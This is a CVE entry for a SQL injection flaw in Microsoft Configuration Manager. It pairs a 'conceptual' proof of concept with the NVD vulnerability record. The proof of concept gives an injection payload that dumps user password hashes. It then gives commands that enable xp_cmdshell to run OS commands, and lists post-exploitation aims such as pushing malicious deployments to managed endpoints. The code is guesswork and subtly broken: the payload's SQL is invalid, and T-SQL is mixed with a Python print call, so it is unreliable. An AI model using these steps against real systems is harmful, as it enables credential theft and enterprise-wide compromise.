CVE-2025-55320

-- CVE-2025-55320 PoC: SQL Injection in Microsoft Configuration Manager -- This PoC demonstrates the concept of SQL injection via the CM management interface -- Note: Actual exploitation requires valid high-privilege credentials and adjacent network access -- Step 1: Identify injectable parameter -- The vulnerability exists in input handling within Configuration Manager's -- administrative console or API endpoints that interact with the site database. -- Step 2: Craft malicious payload -- Example of a malicious input that could be injected into a vulnerable parameter: DECLARE @malicious_input NVARCHAR(MAX); SET @malicious_input = '''; UNION SELECT username, password_hash, 1 FROM v_R_User --'; -- Step 3: The vulnerable code might construct a query like: -- EXEC sp_executesql N'SELECT * FROM v_R_System WHERE Name = ''' + @user_input + '''' -- After injection, the query becomes: -- SELECT * FROM v_R_System WHERE Name = ''; UNION SELECT username, password_hash, 1 FROM v_R_User --' -- Step 4: Privilege escalation via SQL Server extended procedures -- After gaining database access, attempt to execute OS commands: -- EXEC sp_configure 'show advanced options', 1; RECONFIGURE; -- EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- EXEC xp_cmdshell 'whoami'; -- Step 5: Post-exploitation -- Use obtained SYSTEM-level access to: -- - Extract CM site secrets -- - Push malicious software deployment policies -- - Compromise managed endpoints across the enterprise print('CVE-2025-55320 conceptual PoC - requires authenticated access to CM environment')

{"cve": {"id": "CVE-2025-55320", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:45.130", "lastModified": "2025-10-17T17:15:38.893", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Configuration Manager allows an authorized attacker to elevate privileges over an adjacent network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2403:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9128.1035", "matchCriteriaId": "9CEB0E6F-E984-4382-9C88-C506615D9868"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2409:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9132.1029", "matchCriteriaId": "E3B2EC65-EAFA-4938-AAA4-EC49C6A854BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2503:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9135.1008", "matchCriteriaId": "EB0C2F23-3D0B-4683-8956-9DF40D440F2F"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55320", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}